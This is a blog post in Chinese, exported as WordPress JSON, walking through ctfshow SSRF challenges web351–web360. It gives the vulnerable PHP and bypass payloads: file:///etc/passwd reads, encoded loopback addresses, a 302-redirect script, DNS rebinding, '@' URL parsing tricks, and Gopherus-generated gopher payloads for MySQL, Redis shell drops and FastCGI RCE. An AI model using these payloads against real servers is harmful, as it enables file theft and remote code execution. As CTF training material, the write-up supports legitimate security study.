{"id":237,"date":"2021-07-18T14:44:33","date_gmt":"2021-07-18T06:44:33","guid":{"rendered":"http:\/\/101.34.19.194\/?p=237"},"modified":"2021-07-18T14:44:35","modified_gmt":"2021-07-18T06:44:35","slug":"ctfshow-ssrf","status":"publish","type":"post","link":"http:\/\/101.34.19.194\/?p=237","title":{"rendered":"ctfshow\u2014SSRF"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">web351<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>?&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u65b9\u6cd5\u4e00<\/h3>\n\n\n\n<p>\u5ba1\u8ba1\uff0c\u7528post\u4f20\u53c2\u7ed9url<\/p>\n\n\n\n<p>\u53d1\u73b0\u53ef\u4ee5\u7528<code>file:\/\/<\/code>\u8fdb\u884c\u8bfb\u53d6\u6587\u4ef6<\/p>\n\n\n\n<p><code>url=file:\/\/\/etc\/passwd<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210717194117.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210717194117.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20210717194117071\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5c1d\u8bd5\u8bfb\u53d6\u7f51\u7ad9\u6839\u76ee\u5f55\u4e0b\u662f\u5426\u5b58\u5728flag<\/p>\n\n\n\n<p><code>url=file:\/\/\/var\/www\/html\/flag.php<\/code><\/p>\n\n\n\n<p>\u67e5\u770b\u6ce8\u91ca\u5f97\u5230flag<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u65b9\u6cd5\u4e8c<\/h3>\n\n\n\n<p>\u76f4\u63a5\u8bbf\u95ee<code>\/flag.php<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210717194242.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210717194242.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210717194242243\"\/><\/div><\/figure>\n\n\n\n<p>\u63d0\u793a\u975e\u672c\u5730\u7528\u6237\uff0c\u7ed3\u5408\u4ee3\u7801\uff0c\u7528post\u4f20\u53c2<\/p>\n\n\n\n<p><code>url=http:\/\/127.0.0.1\/flag.php<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web352<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>if(!preg_match('\/localhost|127.0.0\/')){<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>}<br>else{<br> &nbsp; 
&nbsp;die('hacker');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<p>\u5c4f\u853d\u4e86<code>localhost|127.0.0<\/code>\uff0c\u7528\u8fdb\u5236\u8f6c\u6362\u7ed5\u8fc7<\/p>\n\n\n\n<p><a href=\"https:\/\/tool.520101.com\/wangluo\/jinzhizhuanhuan\/\">IP\u5730\u5740\u8fdb\u5236\u8f6c\u6362 (520101.com)<\/a><\/p>\n\n\n\n<p><code>url=http:\/\/2130706433\/flag.php<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web353<\/h2>\n\n\n\n<p>\u8ddfweb352\u4e00\u6837\u8f6c\u6362\u505a\u6cd5<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web354<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>if(!preg_match('\/localhost|1|0|\u3002\/i', $url)){<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<p>\u628a1\u548c0\u7b49\u90fd\u8fc7\u6ee4\u4e86\uff0c\u53ea\u80fdASCII\u7801\u8f6c\u6362\u6216\u57df\u540d\u7ed1\u5b9a<\/p>\n\n\n\n<p>\u6709\u73b0\u6210\u7684\u57df\u540d\u8df3\u8f6c127.0.0.1<\/p>\n\n\n\n<p>payload\uff1a<code>url=http:\/\/sudo.cc\/flag.php<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web355<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>$host=$x&#91;'host'];<br>if((strlen($host)&lt;=5)){<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>}<br>else{<br> &nbsp; 
&nbsp;die('hacker');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<p>\u8981\u6c42\u957f\u5ea6\u5c0f\u4e8e\u7b49\u4e8e5\uff0c127.0.0.1\u548c127.1\u662f\u7b49\u4ef7\u7684<\/p>\n\n\n\n<p>payload\uff1a<code>url=http:\/\/127.1\/flag.php<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web356<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>$host=$x&#91;'host'];<br>if((strlen($host)&lt;=3)){<br>$ch=curl_init($url);<br>curl_setopt($ch, CURLOPT_HEADER, 0);<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br>$result=curl_exec($ch);<br>curl_close($ch);<br>echo ($result);<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>}<br>else{<br> &nbsp; &nbsp;die('hacker');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<p>\u957f\u5ea6\u5c0f\u4e8e\u7b49\u4e8e3\uff0cpayload\uff1a<code>url=http:\/\/0\/flag.php<\/code><\/p>\n\n\n\n<p><strong>0\u5728linux\u7cfb\u7edf\u4e2d\u4f1a\u89e3\u6790\u6210127.0.0.1\uff0c\u5728windows\u4e2d\u89e3\u6790\u62100.0.0.0<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web357<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if($x&#91;'scheme']==='http'||$x&#91;'scheme']==='https'){<br>$ip = gethostbyname($x&#91;'host']);<br>echo '&lt;\/br&gt;'.$ip.'&lt;\/br&gt;';<br>if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {<br> &nbsp; &nbsp;die('ip!');<br>}<br>\u200b<br>\u200b<br>echo file_get_contents($_POST&#91;'url']);<br>}<br>else{<br> &nbsp; &nbsp;die('scheme');<br>}<br>?&gt;<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>FILTER_FLAG_IPV4 &#8211; \u8981\u6c42\u503c\u662f\u5408\u6cd5\u7684 IPv4 IP\uff08\u6bd4\u5982 255.255.255.255\uff09 FILTER_FLAG_IPV6 &#8211; \u8981\u6c42\u503c\u662f\u5408\u6cd5\u7684 IPv6 IP\uff08\u6bd4\u5982 
2001:0db8:85a3:08d3:1319:8a2e:0370:7334\uff09 FILTER_FLAG_NO_PRIV_RANGE &#8211; \u8981\u6c42\u503c\u4e0d\u662f RFC \u6307\u5b9a\u7684\u79c1\u57df IP \uff08\u6bd4\u5982 192.168.0.1\uff09 FILTER_FLAG_NO_RES_RANGE &#8211; \u8981\u6c42\u503c\u4e0d\u5728\u4fdd\u7559\u7684 IP \u8303\u56f4\u5185\u3002\u8be5\u6807\u5fd7\u63a5\u53d7 IPV4 \u548c IPV6 \u503c\u3002<\/p><\/blockquote>\n\n\n\n<p>\u6240\u4ee5\u4e0d\u80fd\u662f\u79c1\u6709\u5730\u5740<\/p>\n\n\n\n<p>\u5229\u7528302\u8df3\u8f6c\u548cdns\u91cd\u7ed1\u5b9a\u90fd\u53ef\u4ee5\uff0c\u56e0\u4e3a\u8fc7\u6ee4\u7684\u53ea\u662f\u7b2c\u4e00\u6b21\u89e3\u6790\u5f97\u5230\u7684IP\uff0c\u800cfile_get_contents\u4f1a\u7b2c\u4e8c\u6b21\u89e3\u6790\u57df\u540d\u5e76\u8ddf\u968f\u8df3\u8f6c<\/p>\n\n\n\n<p>\u4e00\u3001<\/p>\n\n\n\n<p>\u5728\u81ea\u5df1\u670d\u52a1\u5668\u5199\u4e2aa.php\uff0c\u5185\u5bb9\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>header(\"Location:http:\/\/127.0.0.1\/flag.php\"); <\/code><\/pre>\n\n\n\n<p>payload\uff1a<code>http:\/\/xxx\/a.php<\/code><\/p>\n\n\n\n<p>\u4e8c\u3001<\/p>\n\n\n\n<p>\u5728\u8fd9\u4e2a\u7f51\u7ad9\u6ce8\u518c\u4e00\u4e2a\u8d26\u53f7<code>http:\/\/ceye.io\/<\/code>\uff0c\u7136\u540e\u4f1a\u7ed9\u4f60\u5206\u914d\u4e00\u4e2a\u57df\u540d\uff0c\u4fee\u6539\u6210\u5982\u4e0b\u7684\u5185\u5bb9\uff0c\u7b2c\u4e00\u4e2a\u968f\u4fbf\u586b\uff0c\u7b2c\u4e8c\u4e2a\u5199 <img decoding=\"async\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" src=\"https:\/\/img-blog.csdnimg.cn\/2020123016283436.png\"><\/p>\n\n\n\n<p>\u7136\u540epayload:<code>http:\/\/r.xxxxxx\/flag.php<\/code> xxx\u4e3a\u5206\u7ed9\u4f60\u7684\u57df\u540d\uff0c\u5982<\/p>\n\n\n\n<p><code>url=http:\/\/r.cvwxxx.ceye.io\/flag.php<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/img-blog.csdnimg.cn\/20201230163344555.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/img-blog.csdnimg.cn\/20201230163344555.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"\/><\/div><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>DNS\u91cd\u7ed1\u5b9a\u53ef\u4ee5\u770b\u770b\u5408\u5929\u7f51\u5b89\u7684\u6587\u7ae0<\/p><p><a href=\"https:\/\/zhuanlan.zhihu.com\/p\/89426041\">\u6d45\u8c08DNS\u91cd\u7ed1\u5b9a\u6f0f\u6d1e &#8211; \u77e5\u4e4e (zhihu.com)<\/a><\/p><\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">web358<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>error_reporting(0);<br>highlight_file(__FILE__);<br>$url=$_POST&#91;'url'];<br>$x=parse_url($url);<br>if(preg_match('\/^http:\\\/\\\/ctf\\..*show$\/i',$url)){<br> &nbsp; &nbsp;echo file_get_contents($url);<br>}<\/code><\/pre>\n\n\n\n<p>\u6b63\u5219\u8868\u8fbe\u5f0f\u7684\u610f\u601d\u662f\u4ee5<code>http:\/\/ctf.<\/code>\u5f00\u5934\uff0c\u4ee5<code>show<\/code>\u7ed3\u5c3e\u3002 payload:<code>http:\/\/ctf.@127.0.0.1\/flag.php?show<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/img-blog.csdnimg.cn\/20201230164344219.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/img-blog.csdnimg.cn\/20201230164344219.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\"\/><\/div><\/figure>\n\n\n\n<blockquote 
class=\"wp-block-quote\"><p>parse_url\u51fd\u6570\u4e2d\uff0c\u628a@\u540e\u9762\u7684\u5185\u5bb9\u5f53\u6210\u4e3b\u673a\u5730\u5740\u89e3\u6790<\/p><\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">web359<\/h2>\n\n\n\n<p>\u5de5\u5177\u4e0b\u8f7d\u5730\u5740<code>https:\/\/github.com\/tarunkant\/Gopherus<\/code><\/p>\n\n\n\n<p>\u5de5\u5177\u4f8b\u5b50<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Examples<\/h2>\n\n\n\n<ul><li>MySQL\uff1a\u5982\u679c\u7528\u6237\u6ca1\u6709\u5bc6\u7801\u4fdd\u62a4\uff0c\u4f60\u53ef\u4ee5\u8f6c\u50a8\u4ed6\u7684\u6570\u636e\u5e93\uff0c\u4e5f\u53ef\u4ee5\u628a\u6076\u610f\u6587\u4ef6\u653e\u5230\u4ed6\u7684\u7cfb\u7edf\u4e2d\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit mysql<\/pre>\n\n\n\n<p>\u5b83\u53ea\u8be2\u95eeMySQL\u7528\u6237\u7684\u7528\u6237\u540d\uff0c\u5b83\u5c06\u4e3a\u60a8\u63d0\u4f9bgopher\u94fe\u63a5\u3002<\/p>\n\n\n\n<ul><li>PostgreSQL\uff1a\u5982\u679c\u7528\u6237\u6ca1\u6709\u5bc6\u7801\u4fdd\u62a4\uff0c\u4f60\u53ef\u4ee5\u8f6c\u50a8\u4ed6\u7684\u6570\u636e\u5e93\uff0c\u4e5f\u53ef\u4ee5\u5728\u4ed6\u7684\u7cfb\u7edf\u4e2d\u653e\u5165\u6076\u610f\u6587\u4ef6\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit postgresql<\/pre>\n\n\n\n<p>\u5b83\u53ea\u8be2\u95eePostgres\u7528\u6237\u7684\u7528\u6237\u540d\u548c\u6570\u636e\u5e93\u540d\u79f0\uff0c\u7136\u540e\u5b83\u5c06\u4e3a\u60a8\u63d0\u4f9bgopher\u94fe\u63a5\u3002<\/p>\n\n\n\n<ul><li>FastCGI\uff1a\u5982\u679c\u7aef\u53e39000\u662f\u5f00\u653e\u7684\uff0c\u6ca1\u6709\u5b89\u5168\u6027\uff0c\u90a3\u4e48\u4f60\u53ef\u4ee5\u5f97\u5230RCE\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit 
fastcgi<\/pre>\n\n\n\n<p>\u5b83\u53ea\u8981\u6c42\u4e00\u4e2a\u5fc5\u987b\u5b58\u5728\u4e8e\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e2d\u7684\u6587\u4ef6\uff08preferred.php\u6587\u4ef6\uff09\uff0c\u4f46\u662f\u6211\u4eec\u6709\u4e00\u4e2a\u9ed8\u8ba4\u6587\u4ef6\u3002<\/p>\n\n\n\n<ul><li>Redis\uff1a\u5982\u679cRedis\u7aef\u53e3\u662f\u6253\u5f00\u7684\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u8986\u76d6\u7cfb\u7edf\u4e2d\u7684\u6587\u4ef6\uff0c\u8fd9\u592a\u5371\u9669\u4e86\u3002\u6240\u4ee5\u8fd9\u91cc\u6709\u4e24\u4e2a\u4e1c\u897f\u53ef\u4ee5\u5f97\u5230\uff1aa.Reverse Shell b.PHP Shell<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit redis<\/pre>\n\n\n\n<ul><li>Zabbix\uff1a\u5982\u679c\u7aef\u53e310050\u662f\u6253\u5f00\u7684<code>EnableRemoteCommands = 1<\/code>\uff0c\u90a3\u4e48\u60a8\u53ef\u4ee5\u5728\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e0a\u8fd0\u884cshell\u547d\u4ee4\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit zabbix<\/pre>\n\n\n\n<ul><li>Memcached\uff1a\u5b83\u4e3b\u8981\u7528\u4e8e\u5b58\u50a8\u5e8f\u5217\u5316\u6570\u636e\uff0c\u4f46\u5f53\u6d89\u53ca\u5230De-serialize\u8fd9\u4e9b\u6570\u636e\u65f6\uff0c\u5df2\u77e5\u7684\u6f0f\u6d1e\uff0c\u5982PHPDe-serialization\u95ee\u9898\uff0cPython-PickleDe-serialization\u95ee\u9898\uff0cRuby-MarshalDe-serialization\u95ee\u9898\u51fa\u73b0\uff0c\u4ece\u800c\u5bfc\u81f4RCE\u3002\u56e0\u6b64\uff0c\u6211\u4e3a\u6bcf\u4e2a\u811a\u672c\u521b\u5efa\u4e86\u4e0d\u540c\u7684\u811a\u672c\uff0c\u8fd8\u521b\u5efa\u4e86\u4e00\u4e2a\u7528\u4e8e\u8f6c\u50a8Memcached\u5185\u5bb9\u7684\u811a\u672c\uff1a<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit pymemcache<br>gopherus --exploit rbmemcache<br>gopherus --exploit phpmemcache<br>gopherus --exploit 
dmpmemcache<\/pre>\n\n\n\n<ul><li>SMTP\uff1a\u5982\u679c\u7aef\u53e325\u662f\u5f00\u653e\u7684\u5e76\u4e14\u6211\u4eec\u53ef\u4ee5\u8bbf\u95ee\u5b83\uff0c\u6211\u4eec\u53ef\u4ee5\u5c06\u6d88\u606f\u53d1\u9001\u7ed9\u4f5c\u4e3a\u53d7\u5bb3\u8005\u7528\u6237\u7684\u4efb\u4f55\u4eba\uff0c\u6240\u4ee5\u8fd9\u4e2a\u5de5\u5177\u5c06\u751f\u6210gopher\u6709\u6548\u8d1f\u8f7d\u6765\u53d1\u9001\u90ae\u4ef6\u3002<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">gopherus --exploit smtp<\/pre>\n\n\n\n<p>python gopherus.py --exploit mysql <img decoding=\"async\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" src=\"https:\/\/img-blog.csdnimg.cn\/20201230164517383.png\"> \u7136\u540e\u4f20\u5230check.php\u4e2dpost: returl=xxxxx,\u4f46\u662f\u4e0d\u8981\u5fd8\u4e86\u628a\u4e0b\u5212\u7ebf\u540e\u9762\u7684\u5185\u5bb9url\u7f16\u7801\u4e00\u6b21\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web360<\/h2>\n\n\n\n<p>python gopherus.py --exploit redis <img decoding=\"async\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" src=\"https:\/\/img-blog.csdnimg.cn\/20201230164820392.png\"> \u64cd\u4f5c\u65b9\u6cd5\u548c\u4e0a\u9762\u4e00\u6837\uff0c\u4e0d\u8981\u5fd8\u8bb0\u7f16\u7801\u3002\u5de5\u5177\u9ed8\u8ba4\u662f\u751f\u6210shell.php<\/p>\n","protected":false},"excerpt":{"rendered":"<p>web351 \u65b9\u6cd5\u4e00 \u5ba1\u8ba1\uff0c\u7528post\u4f20\u53c2\u7ed9url \u53d1\u73b0\u53ef\u4ee5\u7528file:\/\/\u8fdb\u884c\u8bfb\u53d6\u6587\u4ef6 url=file:\/ 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[19],"_links":{"self":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/237"}],"collection":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=237"}],"version-history":[{"count":1,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/237\/revisions"}],"predecessor-version":[{"id":238,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/237\/revisions\/238"}],"wp:attachment":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=237"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=237"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}